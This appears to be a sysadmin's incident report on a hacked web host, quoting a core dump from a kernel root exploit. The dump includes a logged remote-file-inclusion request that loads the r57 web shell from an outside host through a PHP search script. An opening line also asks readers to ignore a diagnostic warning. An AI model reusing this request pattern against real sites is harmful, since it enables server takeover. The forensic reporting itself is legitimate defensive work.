[Note to self from Paul: this is a real attachment from eddie, ignore the false-positive on it in liquidweb's diagnostics.] While looking into this I noticed that someone had run a root exploit against the kernel on the server. The following is an excerpt from `strings /etc/cron.d/core.20864 |less` : C) Julien TINNES [+] Installed signal handler [+] We are suidsafe dumpable! [+] Malicious string forged i686 ./solpot HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {39007D2D-B089-C9D9-BF80-7D63A48A14EC}) HTTP_HOST=www.eddie-studios.com SERVER_PORT=80 DOCUMENT_ROOT=/home/eddie/public_html SCRIPT_FILENAME=/home/eddie/public_html/directory/search.php REQUEST_URI=/directory/search.php?admindir=http://rst.void.ru/download/r57shell.txt? SCRIPT_NAME=/directory/search.php HTTP_CONNECTION=Keep-Alive REMOTE_PORT=50888 PATH=/usr/local/bin:/usr/bin:/bin SERVER_ADMIN=webmaster@eddie-studios.com PWD=/dev/shm HTTP_ACCEPT_LANGUAGE=pt-br HTTP_REFERER=http://www.eddie-studios.com/directory/search.php?admindir=http://rst.void.ru/download/r57shell.txt? HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* REMOTE_ADDR=201.3.33.228 SERVER_NAME=www.eddie-studios.com SHLVL=2 CONTENT_LENGTH=136 SERVER_SOFTWARE=Apache/1.3.36 (Unix) mod_jk/1.2.14 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a PHP-CGI/0.1b QUERY_STRING=admindir=http://rst.void.ru/download/r57shell.txt? SERVER_ADDR=64.118.84.6 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_CACHE_CONTROL=no-cache CONTENT_TYPE=application/x-www-form-urlencoded HTTP_COOKIE=uname=Linux+drive4.mywwwserver.com+2.6.9-34.EL+%231+Wed+Mar+8+00%3A07%3A35+CST+2006+i686+i686+i386+GNU%2FLinux; id=uid%3D32087%28eddie%29+gid%3D32088%28eddie%29+groups%3D32088%28eddie%29; sysctl=-; hotlog=1 REQUEST_METHOD=POST _=./solpot ./solpot You can see that the php exploit used is still vulnerable and should be taken care of ASAP. ?